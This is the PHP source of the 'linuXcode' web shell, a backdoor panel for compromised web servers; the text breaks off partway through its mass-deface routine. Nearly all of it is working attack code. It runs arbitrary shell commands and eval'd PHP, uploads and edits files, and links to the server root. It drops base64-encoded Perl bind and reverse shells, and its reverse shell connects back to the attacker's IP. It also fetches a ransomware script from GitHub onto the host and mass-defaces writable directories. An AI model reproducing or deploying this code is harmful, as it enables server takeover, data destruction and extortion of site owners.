linuXcode shell

1. <?php
2. /**********************************************
3. *               "linuXcode.org"               *
4. ----------------------------------------------*
5. * Author  : shutdown57 a.k.a alinko kun       *
6. * Contact : alinkokomansuby@gmail.com         *
7. * Gretting: You and Who use this!             *
8. *          -[ copyright (c) 2k17 ]-           *                
9. **********************************************/
10. session_start();
11. ini_set('max_execution_time',60);
12. $s57_paswot="bGludXhjb2Rl";
13. function shutdown57_login() {
14.     echo "<center><h1>:-[ linuXcode.org ]-:</h1>";
15.     echo "<p>^[ linuXcode shell - version 2017 ]^</p>";
16.     echo  "<form method='post'><input type='password' name='pass' placeholder='password here' style='margin:top:300px;border:1px solid #000;color:#f00;width:300px'></form></center>";
17.     exit;
18. }
19.  
20.  
21. if( !isset($_SESSION[base64_encode($_SERVER['HTTP_HOST'])] ))
22.     if( empty($s57_paswot) ||
23.         ( isset( $_POST['pass'] ) && (base64_encode($_POST['pass']) == $s57_paswot) ) )
24.         $_SESSION[base64_encode($_SERVER['HTTP_HOST'])] = true;
25.     else
26.         shutdown57_login();
27. function a_cmd($command){
28.     if(function_exists('system')){
29.         $a_cmd=@system($command);
30.     }elseif (function_exists('exec')) {
31.         $a_cmd=@exec($command);
32.     }elseif (function_exists('shell_exec')) {
33.         $a_cmd=@shell_exec($command);
34.     }elseif (function_exists('passthru')) {
35.         $a_cmd=@passthru($command);
36.     }
37.     @ob_start();
38.     $a_cmd.=@ob_get_contents();
39.     return $a_cmd;
40. }
41. function a_upl($tmp,$file){
42.     if(function_exists('move_uploaded_file')){
43.         $a_upl=@move_uploaded_file($tmp,$file);
44.     }elseif (function_exists('copy')) {
45.         $a_upl=@copy($tmp,$file);
46.     }
47.     return $a_upl;
48. }
49. function a_getx($url, $isi) {
50.         $fp = fopen($isi, "w");
51.         $ch = curl_init();
52.               curl_setopt($ch, CURLOPT_URL, $url);
53.               curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);
54.               curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
55.               curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
56.               curl_setopt($ch, CURLOPT_FILE, $fp);
57.         return curl_exec($ch);
58.               curl_close($ch);
59.         fclose($fp);
60.         ob_flush();
61.         flush();
62.     }
63. function a_fsize($files){
64.             $size = filesize($files)/1024;
65.             $size = round($size,3);
66.             if($size > 1024) {
67.                 $size = round($size/1024,2). 'MB';
68.             } else {
69.                 $size = $size. 'KB';
70.             }
71.             return $size;
72. }
73. function a_own($path){
74.     if(function_exists('posix_getpwuid')) {
75.                     $downer = @posix_getpwuid(fileowner($path));
76.                     $downer = $downer['name'];
77.                 } else {
78.                     //$downer = $uid;
79.                     $downer = fileowner($path);
80.                 }
81.             return $downer;
82. }
83. function a_group($path){
84.     if(function_exists('posix_getgrgid')) {
85.                     $dgrp = @posix_getgrgid(filegroup($path));
86.                     $dgrp = $dgrp['name'];
87.                 } else {
88.                     $dgrp = filegroup($path);
89.                 }
90.                 return $dgrp;
91. }
92. function a_sperm($file){
93.     $perms = fileperms($file);
94.     if (($perms & 0xC000) == 0xC000) {
95.     $info = 's';
96.     } elseif (($perms & 0xA000) == 0xA000) {
97.     $info = 'l';
98.     } elseif (($perms & 0x8000) == 0x8000) {
99.     // Regular
100.     $info = '-';
101.     } elseif (($perms & 0x6000) == 0x6000) {
102.     // Block special
103.     $info = 'b';
104.     } elseif (($perms & 0x4000) == 0x4000) {
105.     // Directory
106.     $info = 'd';
107.     } elseif (($perms & 0x2000) == 0x2000) {
108.     // Character special
109.     $info = 'c';
110.     } elseif (($perms & 0x1000) == 0x1000) {
111.     // FIFO pipe
112.     $info = 'p';
113.     } else {
114.     // Unknown
115.     $info = 'u';
116.     }
117.         // Owner
118.     $info .= (($perms & 0x0100) ? 'r' : '-');
119.     $info .= (($perms & 0x0080) ? 'w' : '-');
120.     $info .= (($perms & 0x0040) ?
121.     (($perms & 0x0800) ? 's' : 'x' ) :
122.     (($perms & 0x0800) ? 'S' : '-'));
123.     // Group
124.     $info .= (($perms & 0x0020) ? 'r' : '-');
125.     $info .= (($perms & 0x0010) ? 'w' : '-');
126.     $info .= (($perms & 0x0008) ?
127.     (($perms & 0x0400) ? 's' : 'x' ) :
128.     (($perms & 0x0400) ? 'S' : '-'));
129.     // World
130.     $info .= (($perms & 0x0004) ? 'r' : '-');
131.     $info .= (($perms & 0x0002) ? 'w' : '-');
132.     $info .= (($perms & 0x0001) ?
133.     (($perms & 0x0200) ? 't' : 'x' ) :
134.     (($perms & 0x0200) ? 'T' : '-'));
135.     return $info;
136. }
137. function a_hdd($s) {
138.     if($s >= 1073741824)
139.     return sprintf('%1.2f',$s / 1073741824 ).' GB';
140.     elseif($s >= 1048576)
141.     return sprintf('%1.2f',$s / 1048576 ) .' MB';
142.     elseif($s >= 1024)
143.     return sprintf('%1.2f',$s / 1024 ) .' KB';
144.     else
145.     return $s .' B';
146. }
147. function a_download($file){
148.      @ob_clean();
149.     header('Content-Description: File Transfer');
150.     header('Content-Type: application/octet-stream');
151.     header('Content-Disposition: attachment; filename="'.basename($file).'"');
152.     header('Expires: 0');
153.     header('Cache-Control: must-revalidate');
154.     header('Pragma: public');
155.     header('Content-Length: ' . filesize($file));
156.     return readfile($file);
157.     exit;
158. }
159. function a_rmdir($d){
160.         if(!rmdir($d)){
161.         $s=scandir($d);
162.         foreach ($s as $ss) {
163.             if(is_file($d."/".$ss)){
164.                 if(unlink($d."/".$ss)){
165.                     rmdir($d);
166.                     }
167.             }
168.             if(is_dir($d."/".$ss)){
169.                 rmdir($d."/".$ss);
170.                 rmdir($d);
171.                
172.             }
173.         }
174.     }
175.     }
176. function a_gantipass($old,$new){
177.     $file=getcwd()."/".$_SERVER['PHP_SELF'];
178.     $getc=file_get_contents($file);
179.     $pw=str_replace("".$old."","".$new."",$getc);
180.     $fp=fopen($file,"w");
181.     return fwrite($fp,$pw);
182.     fclose($fp);
183.  
184. }
185. // started alinko here
186. if(empty($_GET['o'])&&empty($_GET['d'])){
187.     $d=getcwd();
188. }else{
189.     if(!empty($_GET['o'])){
190.         $d=$_GET['o'];
191.     }else{
192.         if(!empty($_GET['d'])){
193.             if(file($_GET['d'])){
194.                 $d=dirname($_GET['d']);
195.             }else{
196.                 $d=$_GET['d'];
197.             }
198.         }
199.     }
200. }
201. if(function_exists('scandir')){
202. $s=@scandir($d);
203. }else{
204. echo "<h1><font color=red> SCANDIR(); FUNCTIONS HAS BEEN DISABLED IN THIS WEBSHIT</font></h1>";
205. }
206. echo "<html><head><title>linuXcode.org - ".$_SERVER['HTTP_HOST']."</title>";
207. echo "
208. <style type=\"text/css\">
209. @import url('https://fonts.googleapis.com/css?family=Josefin+Sans');
210. *{font-family:'Josefin Sans',cursive;}
211.     body{background:black;color:#fff;}.a_exp{border:1px solid #fff;border-collapse: collapse;}.a_exp tr:hover{background:blue;}a{text-decoration: none;color:#fff;}.a_exp a{color:#fff;}.a_exp a:hover{text-decoration: underline;}textarea,input,select{color:#fff;border:1px solid  blue;background: transparent;}li{list-style: none;display: inline-block;}li a{color:#fff;text-decoration: none;background:#333;padding:3px;margin:3px;}li a:hover{color:#fff;background:blue;text-decoration: none;}thead{background:#333;color:#fff;}a:hover{text-decoration: underline;}.a_phpinfo{background:#000;color:#fff;border:1px solid #fff;text-align:center;}.a_phpinfo th,.a_phpinfo tr,.a_phpinfo td{border-collapse:collapse;border:1px solid blue;}option{background:#000;color:blue;border:0;}
212. </style>";
213. if(!function_exists('posix_getegid')) {
214.     $user = @get_current_user();
215.     $uid = @getmyuid();
216.     $gid = @getmygid();
217.     $group = "?";
218. } else {
219.     $uid = @posix_getpwuid(posix_geteuid());
220.     $gid = @posix_getgrgid(posix_getegid());
221.     $user = $uid['name'];
222.     $uid = $uid['uid'];
223.     $group = $gid['name'];
224.     $gid = $gid['gid'];
225. }
226. $sm= ini_get('safe_mode') ? "<font color=lime> ON<?font>" : "<font color=grey> OFF</font>";
227. $mysql= function_exists('mysql_connect')?"<font color=lime> ON</font>":"<font color=grey> OFF</font>";
228. $url_fp =ini_get('url_fopen')?"<font color=lime> ON</font>":"<font color=grey> OFF</font>";
229. $curl=function_exists('curl_init')?"<font color=lime> ON</font>":"<font color=grey> OFF</font>";
230. $df=ini_get('disable_functions') ? substr(ini_get('disable_functions'),0,50).",etc..." : "<font color=grey> NONE</font>";
231. echo "
232. <table style='width:100%;border:1px solid #fff;background:url(http://1.bp.blogspot.com/-usVrT4Mr7GE/WH8G6HTXFtI/AAAAAAAAAcE/AdYRFrzLkTMDrsxAU4AXqdZg-mF4KmFZQCK4B/s1600/logo.png)no-repeat center;'><tr><td>
233. <pre style='font-size:13px;'>
234. SERVER SOFTWARE : ".$_SERVER['SERVER_SOFTWARE']."
235. UNAME : ".php_uname()."
236. HOSTNAME : ".$_SERVER['HTTP_HOST']."
237. IP SERVER : ".gethostbyname($_SERVER['HTTP_HOST'])." | YOUR IP : ".$_SERVER['REMOTE_ADDR']."
238. User: <font color=lime>".$user."</font> (".$uid.") Group: <font color=lime>".$group."</font> (".$gid.")
239. PHP version : ".phpversion()."-[<a href='?f=phpinfo&d=$d'>PHPINFO</a>]
240. HDD Free Space: ".a_hdd(diskfreespace($d))."
241. CURL:".$curl."|safemode:".$sm."|URL FOPEN:".$url_fp."|MySQL:".$mysql."
242. DISABLE FUNCTIONS :".$df."</pre>";
243. echo "</td><td>";
244. echo "<ul>";
245. echo "<li> <a href='?x'>Home</a></li>";
246. echo "<li> <a href='?f=upl&d=".$d."'>Upload</a></li>";
247. echo "<li> <a href='?f=sh&d=".$d."'>Shell</a></li>";
248. echo "<li> <a href='?f=net&d=".$d."'>Network</a></li>";
249. echo "<li> <a href='?f=cp&d=".$d."'>Change Password</a></li>";
250. echo "<li> <a href='?f=out&d=".$d."'>LogOut</a></li><br><br>";
251. echo "<li> <a href='?f=mas&d=".$d."'>Mass Deface</a></li>";
252. echo "<li> <a href='?f=sym&d=".$d."'>Symlink</a></li>";
253. echo "<li> <a href='?f=zh&d=".$d."'>Zone-H</a></li>";
254. echo "<li> <a href='?f=php&d=".$d."'>PHP</a></li>";
255. echo "<li> <a href='?f=adm&d=".$d."'>Adminer</a></li>";
256. echo "<li> <a href='?f=rsmw&d=".$d."'>Ransomeware</a></li>";
257. echo "</ul></td></tr><tr><td>";
258. echo "<font color=blue>Current dir :";
259. $d=str_replace('\\','/',$d);
260. $path = explode('/',$d);
261. foreach($path as $id=>$curdir){
262. if($curdir == '' && $id == 0){
263. $a = true;
264. echo '<a href="?o=/">/</a>';
265. continue;
266. }
267. if($curdir == '') continue;
268. echo '<a href="?o=';
269. for($i=0;$i<=$id;$i++){
270. echo "$path[$i]";
271. if($i != $id) echo "/";
272. }
273. echo '">'.$curdir.'</a>/';
274. }
275. $pwd=str_replace('\\','/',getcwd());
276. $a_w=(is_writable($d)) ? "#<font color=lime>W</font>" : "#<font color=red>R</font>";
277. echo "</font> ($a_w) </td><td><form method='get'><label for='o'>Go to dir :</label><input type='text' name='o' value='$d' style='border:0;'></form><td></table>";
278. echo" <br><hr>";
279. if(@empty($_GET['f'])){
280. echo "<form method='POST'>";
281. echo "<table  style='width:100%;' class='a_exp'><thead><th>^</th><th>Name</th><th>Size</th><th>Type</th><th>Date Modified</th><th>Own:Group</th><th>Permission</th><th>Actions</th></thead>";
282. echo "<tbody><tr><td>@</td><td><a href='?o=".dirname($d)."'>..</a></td><td>#!</td><td>#!</td><td>#!</td><td>#!</td><td>#!</td><td><a href='?f=mkdir&d=".$d."'>newDir</a> / <a href='?f=newfile&d=".$d."'>newFiles</a></td></tr>";
283. foreach ($s as $dir) {
284.     if(!is_dir("$d/$dir")||$dir=='.'||$dir=='..')continue;
285.     $a_ftype=@mime_content_type ("$d/$dir");
286.     $a_fdm=@date("D m Y g:i:s", filemtime("$d/$dir"));
287.     $a_own=@a_own("$d/$dir");
288.     $a_gro=@a_group("$d/$dir");
289.     $a_sperm=@a_sperm("$d/$dir");
290.     echo "<tr><td><input type='checkbox' name='cekd[]' value='".$d."/".$dir."'></td><td><a href='?o=".$d."/".$dir."'>".$dir."</a></td><td>--</td>";
291.     echo "<td>".$a_ftype."</td><td>".$a_fdm."</td><td>".$a_own.":".$a_gro."</td><td>".$a_sperm."</td>";
292.     echo "<td>";
293.     echo "<a href='?f=rename&d=".$d."/".$dir."'>rename</a> / <a href='?f=rmdir&d=".$d."/".$dir."'>delete</a>";
294.     echo "</td></tr>";
295. }
296. foreach ($s as $fil) {
297.     if(!is_file("$d/$fil")||$fil=='.'||$fil=='..')continue;
298.         $a_fsize=@a_fsize("$d/$fil");
299.         $a_ftype=@mime_content_type("$d/$fil");
300.         $a_fdm=@date("D m Y g:i:s", filemtime("$d/$fil"));
301.         $a_own=@a_own("$d/$fil");
302.         $a_gro=@a_group("$d/$fil");
303.         $a_sperm=@a_sperm("$d/$fil");
304.     echo "<tr><td><input type='checkbox' name='cekf[]' value='".$d."/".$fil."'></td><td><a href='?f=vf&d=".$d."/".$fil."'>".$fil."</a></td><td>".$a_fsize."</td>";
305.     echo "<td>".$a_ftype."</td><td>".$a_fdm."</td><td>".$a_own.":".$a_gro."</td><td>".$a_sperm."</td>";
306.     echo "<td>";
307.     echo "<a href='?f=rename&d=".$d."/".$fil."'>rename</a> / <a href='?f=edit&d=".$d."/".$fil."'>edit</a> / <a href='?f=rm&d=".$d."/".$fil."'>delete</a> / <a href='?f=dl&d=".$d."/".$fil."'>dl</a>";
308.     echo "</td></tr>";
309. }
310. echo "<tr><td colspan='8'>";
311. echo "<select name='select' style='width:400px'>
312. <option> action selected files</option>
313. <option value='del'>delete</option>
314. <option value='copy'>Copy</option>";
315. if(function_exists('system')){
316. echo"
317. <option value='unzip'>unzip </option>
318. <option value='tar'>ekstrak .tar.* </option>
319. ";
320. }
321. echo"
322. </select>
323. <input type='submit' name='sbmt' value='>>' >
324. </form>";
325. echo"</td></tr>";
326. echo "</tbody></table>";
327. if(isset($_POST['sbmt'])){
328.     $file=$_POST['cekf'];
329.     $dir=$_POST['cekd'];
330.     if($_POST['select']=='del'){
331.         if($_POST['cekf']){
332.            
333.             foreach ($file as $cekf) {
334.                 if(unlink($cekf)){
335.                     echo"<meta http-equiv='refresh' content=0;url=>";
336.                 }
337.             }
338.         }
339.     if($_POST['cekd']){
340.        
341.         foreach ($dir as $cekd) {
342.         if(a_rmdir($cekd)){
343.             echo"<meta http-equiv='refresh' content=0;url=>";
344.         }
345.         }}
346.         }elseif ($_POST['select']=='copy') {
347.         $_SESSION['copy']=$_POST['cekf'];
348.         echo "<meta http-equiv='refresh' content=0;url=?f=copy&d=$d>";
349.         }elseif ($_POST['select']=='unzip') {
350.         $uz=$_POST['cekf'];
351.         foreach($uz as $unzip){
352.         system('unzip '.$unzip);
353.     }
354.         }elseif ($_POST['select']=='tar') {
355.         $tar=$_POST['cekf'];
356.         foreach($tar as $gz){
357.         system('tar -xvf '.$gz);
358.         }
359.         }
360.     }
361. }else{
362.     $a_f=$_GET['f'];
363.     if($a_f == "vf"){
364.         $a_ctext="<textarea readonly style='width:100%;height:700px'>".htmlspecialchars(file_get_contents($_GET['d']))."</textarea>";
365.         if (preg_match("/text/",mime_content_type($_GET['d']))) {
366.             echo $a_ctext;
367.         }else{
368.             a_download($_GET['d']);
369.         }
370.     }elseif ($a_f == "dl") {
371.         a_download($_GET['d']);
372.     }elseif ($a_f == "rename") {
373.         echo "<center><form method='POST'><label for='rename'> Newname :</label>";
374.         echo"<input type='text' name='rename' value='".basename($_GET['d'])."' style='width:500px;'><input type='submit' value='>>' name='srename'></form></center>";
375.         if (isset($_POST['srename'])) {
376.             if(rename(urldecode($_GET['d']),dirname($_GET['d'])."/".htmlspecialchars($_POST['rename']))){
377.                 echo "<script>window.location.href='?o=".dirname($_GET['d'])."'</script>";
378.             }else{
379.                 echo "<font color=red><b><center> PERMISSION DENIED </b></center></font>";
380.             }
381.         }
382.     }elseif ($a_f == "edit") {
383.     echo "<center><form method='POST'><textarea style='width:90%;height:600px;' name='fedit'>".htmlspecialchars(file_get_contents($_GET['d']))."</textarea><br>";
384.     echo "<label for='fname'>save as:</label>";
385.     echo "<input type='text' style='width:600px;' value='".$_GET['d']."' name='fname' ><input type='submit' name='sf' value='save'></form></center>";
386.     if(isset($_POST['sf'])){
387.         $f=@fopen($_POST['fname'],"w");
388.         if (@fwrite($f,$_POST['fedit'])) {
389.             echo "<script>window.location.href='?o=".dirname($_GET['d'])."'</script>";
390.         }else{
391.             echo "<font color=red><b><center> PERMISSION DENIED </b></center></font>";
392.         }
393.     }
394.     }elseif ($a_f == "rm") {
395.         if(unlink($_GET['d'])){
396.             echo "<script> window.location.href='?o=".dirname($_GET['d'])."'</script>";
397.         }else{
398.             echo "<font color=red><b><center> PERMISSION DENIED </b></center></font>";
399.         }
400.     }elseif ($a_f == "rmdir") {
401.         if(@a_rmdir($_GET['d'])){
402.             echo "<script> window.location.href='?o=".dirname($_GET['d'])."'</script>";
403.         }else{
404.             echo "<script> window.location.href='?o=".dirname($_GET['d'])."'</script>";
405.         }
406.     }elseif ($a_f == "mkdir") {
407.         echo "<center><form method='POST'><label for='nfolder'>New Directory :</label>";
408.         echo "<input type='text' name='nfolder' value='newfolder_45' style='width:500px'><input type='submit' name='sf' value='>>'></form></center>";
409.         if(isset($_POST['sf'])){
410.             if(@mkdir($_POST['nfolder'])){
411.                 echo "<script> window.location.href='?o=".$_GET['d']."'</script>";
412.             }else{
413.                 echo "<font color=red><b><center> PERMISSION DENIED </b></center></font>";
414.             }
415.         }
416.     }elseif ($a_f == "newfile") {
417.     echo "<center><form method='POST'><textarea style='width:90%;height:600px;' name='fedit'>// newfile 1945 shell</textarea><br>";
418.     echo "<label for='fname'>save as:</label>";
419.     echo "<input type='text' style='width:600px;' value='1945_newfile.php' name='fname' ><input type='submit' name='sf' value='save'></form></center>";
420.     if (isset($_POST['sf'])) {
421.         $f=@fopen($_GET['d']."/".$_POST['fname'],"w");
422.         if(@fwrite($f,$_POST['fedit'])){
423.             echo "<script> window.location.href='?o=".$_GET['d']."'</script>";
424.         }else{
425.             echo "<font color=red><b><center> PERMISSION DENIED </b></center></font>";
426.         }
427.     }
428.     }elseif ($a_f == "upl") {
429.     $a_w_r=(is_writable(getcwd())) ? "<font color=lime>".getcwd()."</font>" : "<font color=red>".getcwd()."</font>";
430.     $a_w_d=(is_writable($_GET['d'])) ? "<font color=lime>".$_GET['d']."</font>" : "<font color=red>".$_GET['d']."</font>";
431.     echo "<center><table><tr><td><form method='POST' enctype='multipart/form-data'>";
432.     echo "<label for='ufile'>Upload files :</label><input type='file' name='ufile' style='width:300px;border:0;'></td></tr>";
433.     echo "<tr><td><label for='droot'>Upload to : </label>";
434.     echo "<input type='radio' name='droot' value='".getcwd()."'> <i>".$a_w_r."</i>";
435.     echo "<input type='radio' name='droot' value='".$_GET['d']."' checked><i>".$a_w_d."</i></td></tr>";
436.     echo "<tr><td><input type='submit' value='xXx Upload? xXx' style='width:100%;'></form></td></table></center>";
437.     if(!empty($_FILES['ufile']['tmp_name'])){
438.         $a_diru=$_POST['droot']."/".$_FILES['ufile']['name'];
439.         if(a_upl($_FILES['ufile']['tmp_name'],$a_diru)){
440.             echo "<script>alert('Upload done!!');</script>";
441.             echo "<center><b><i>Uploaded to -> ".$a_diru."</i></b></center>";
442.         }else{
443.             echo "<center><b><i>Can't Upload files~~</i></b></center>";
444.         }
445.     }
446.     }elseif ($a_f == "sh") {
447.     $a_val=(empty($_POST['cmd'])) ? "" : $_POST['cmd'];
448.     echo "<center><div style='border-bottom:1px solid #fff;'><form method='POST'><label for='cmd'>1945@".$_SERVER['HTTP_HOST'].": ".$_GET['d']." \$ </label>";
449.     echo "<input type='text' name='cmd' value='".$a_val."' style='width:600px;border:0;'></form></center>";
450.     if(isset($_POST['cmd'])){
451.         if(preg_match("/^cd/",$_POST['cmd'])){
452.             $a_direct=explode(" ",$_POST['cmd']);
453.             echo "<script>window.location.href='?o=".$a_direct[1]."'</script>";
454.         }else{
455.             echo "<center><pre><textarea style='width:80%;height:600px;resize:none;' readonly>";
456.             @a_cmd($_POST['cmd']);
457.             echo "</textarea></pre></center>";
458.         }
459.     }
460.  
461.     }elseif ($a_f == "net") {
462.     echo "<center><form method='post'>";
463.     echo "<table><tr><td colspan='2'><u>Bind Port:</u> <br>PORT: <input type='text' placeholder='port' name='port_bind' value='1945' style='width:80%;'><input type='submit' name='sub_bp' value='>>'></form></td></tr>";
464.     echo "<tr><td><form method='post'><u>Back Connect:</u> <br>Server: <input type='text' placeholder='ip' name='ip_bc' value='".$_SERVER['REMOTE_ADDR']."'></td><td>&nbsp;&nbsp;
465.     PORT: <input type='text' placeholder='port' name='port_bc' value='1945'><input type='submit' name='sub_bc' value='>>'>
466.     </form></td></tr></table>";
467.     $bind_port_p="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0=";
468.     if(isset($_POST['sub_bp'])) {
469.         $f_bp = fopen("/tmp/bp.pl", "w");
470.         fwrite($f_bp, base64_decode($bind_port_p));
471.         fclose($f_bp);
472.  
473.         $port = $_POST['port_bind'];
474.         $out = @a_cmd("perl /tmp/bp.pl $port 1>/dev/null 2>&1 &");
475.         sleep(1);
476.         echo "<pre>".$out."\n".a_cmd("ps aux | grep bp.pl")."</pre>";
477.         unlink("/tmp/bp.pl");
478.     }
479.     $back_connect_p="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7";
480.     if(isset($_POST['sub_bc'])) {
481.         $f_bc = fopen("/tmp/bc.pl", "w");
482.         fwrite($f_bc, base64_decode($back_connect_p));
483.         fclose($f_bc);
484.  
485.         $ipbc = $_POST['ip_bc'];
486.         $port = $_POST['port_bc'];
487.         $out = a_cmd("perl /tmp/bc.pl $ipbc $port 1>/dev/null 2>&1 &");
488.         sleep(1);
489.         echo "<pre>".$out."\n".a_cmd("ps aux | grep bc.pl")."</pre>";
490.         unlink("/tmp/bc.pl");
491.     }
492.     }elseif ($a_f == "out") {
493.         session_destroy();
494.         echo "<script>window.location.href='?a=croted'</script>";
495.     }elseif ($a_f == "copy") {
496.     $kopi=$_SESSION['copy'];
497.     echo "<center><form method='post'>";
498.     foreach($kopi as $cp){
499.         echo "Filename :<input type='text' name='kopi[]' value='$cp' > <br>";  
500.     }
501.     echo " Copy to : <input type='text' name='dst' value='$d'><input type='submit' value='>>' name='sbmt'></form>";
502.     if(isset($_POST['sbmt'])){
503.         $kopi=$_POST['kopi'];
504.         $dst=$_POST['dst'];
505.         foreach($kopi as $copi){
506.         $kopied=$dst."/".basename($copi);
507.         if(copy($copi,$kopied)){
508.             echo " $copi COPIED TO $kopied <br>";
509.         }
510.         }
511.     }
512.     }elseif ($a_f == "phpinfo") {
513.     @ob_start();
514.     @eval("phpinfo();");
515.     $buff = @ob_get_contents();
516.     @ob_end_clean();   
517.     $awal = strpos($buff,"<body>")+6;
518.     $akhir = strpos($buff,"</body>");
519.     echo "<center><div class='a_phpinfo'>".substr($buff,$awal,$akhir-$awal)."</div></center>";
520.     }elseif ($a_f == "cp") {
521.         if(empty($_POST['change'])){
522.     echo "<center><h1>Change Password</h1><table><tr><td><form method='post'>";
523.     echo "<input type='hidden' name='old' value='".$s57_paswot."' >";
524.     echo "New password     </td><td><input type='password' name='new' ></td></tr><tr><td>";
525.     echo "Confirm password </td><td><input type='password' name='neww' ></td></tr><tr><td colspan='2'>";
526.     echo "<input type='submit' name='change' value='change password'></form></td></tr></table></center>";
527. }else{
528.     if($_POST['new']==$_POST['neww']){
529.     if(a_gantipass($_POST['old'],base64_encode($_POST['new']))){
530.         echo "<script>alert('password berhasil di ubah!'); window.location.href='?f=out&pass=".base64_encode($_POST['new'])."';</script>";
531.     }else{
532.         echo "<script>alert('tidak bisa ubah password?');</script>";
533.     }
534.     }else{
535.         echo "<script>alert('Password doesn\'t match!')</script>";
536.     }
537.     }
538. }elseif ($a_f == "sym") {
539.     if(!file_exists('linuXcode.org')){
540.     if(function_exists('system')){
541.         system('ln -s / linuXcode.org');
542.             echo "<br><br><h3> Created Symbolic Link Done!</h3><br> <b><a href='linuXcode.org' target='_blank'>Klik Disini Mhanx</a>";
543.     }
544.     else{
545.         echo "<h1> FUNCTION SYSTEM() NOT FOUND IN THIS SERVER";
546.     }
547. }else{
548.     echo "<center><h1>Symbolic Link Created <a href='linuXcode.org' target='_blank'>in here</a></h1>";
549.     echo "<a href='?f=rmsym'>REMOVE Symbolic Link</a>";
550. }
551. }elseif ($a_f == "rmsym") {
552.     system('rm -rf linuXcode.org');
553.     echo"<script>window.location.href='?'</script>";
554. }elseif ($a_f == "php") {
555.     echo "<center><h1>PHP EVAL</h1><form method='POST'><textarea name='php_e' style='width:90%;height:400px;resize:none;' onchange='this.form.submit()'></textarea><br><input type='submit' value='Eval mhanx'></form></center>";
556.     if(isset($_POST['php_e'])){
557.         echo "<hr>";
558.         @eval($_POST['php_e']);
559.     }
560. }elseif ($a_f == "rsmw") {
561.     if(a_getx("https://raw.githubusercontent.com/bug7sec/Ransomware/master/v2/AwesomeWare.php","AwesomeWare.php")){
562.         echo "<center><h1>AwesomeWare Created!</h1>";
563.         echo "<h2><a href='AwesomeWare.php' target='_blank'>Click here</a></h2></center>";
564.     }else{
565.         echo "<center><h1> Can't Create Ransomware </h1></center>";
566.     }
567. }elseif ($a_f == "adm") {
568.     if(a_getx("https://www.adminer.org/static/download/4.2.4/adminer-4.2.4.php","adminer.php")){
569.         echo "<center><h1> Adminer Created !</h1>";
570.         echo "<h2><a href='adminer.php' target='_blank'>Click Here</a></h2></center>";
571.     }else{
572.         echo "<center><h1>Can't Create Adminer</h1></center>";
573.     }
574. }elseif ($a_f == "mas") {
575.     echo'<center>
576.     <h1>  Mass deface </h1>
577.     <small> Original Script by indoXploit </small>';
578.     function sabun_massal($dir,$namafile,$isi_script) {
579.         if(is_writable($dir)) {
580.             $dira = scandir($dir);
581.             foreach($dira as $dirb) {
582.                 $dirc = "$dir/$dirb";
583.                 $lokasi = $dirc.'/'.$namafile;
584.                 if($dirb === '.') {
585.                     file_put_contents($lokasi, $isi_script);
586.                 } elseif($dirb === '..') {
587.                     file_put_contents($lokasi, $isi_script);
588.                 } else {
589.                     if(is_dir($dirc)) {
590.                         if(is_writable($dirc)) {
591.                             echo "[<font color=lime>DONE</font>] $lokasi<br>";
592.                             file_put_contents($lokasi, $isi_script);
593.                             $idx = sabun_massal($dirc,$namafile,$isi_script);
594.                         }
595.                     }
596.                 }
597.             }
598.         }
599.     }
600.     function sabun_biasa($dir,$namafile,$isi_script) {
601.         if(is_writable($dir)) {
602.             $dira = scandir($dir);
603.             foreach($dira as $dirb) {
604.                 $dirc = "$dir/$dirb";
605.                 $lokasi = $dirc.'/'.$namafile;
606.                 if($dirb === '.') {
607.                     file_put_contents($lokasi, $isi_script);
608.                 } elseif($dirb === '..') {
609.                     file_put_contents($lokasi, $isi_script);
610.                 } else {
611.                     if(is_dir($dirc)) {
612.                         if(is_writable($dirc)) {
613.                             echo "[<font color=lime>DONE</font>] $dirb/$namafile<br>";
614.                             file_put_contents($lokasi, $isi_script);
615.                         }
616.                     }
617.                 }
618.             }
619.         }
620.     }
621.     if($_POST['start']) {
622.         if($_POST['tipe_sabun'] == 'mahal') {
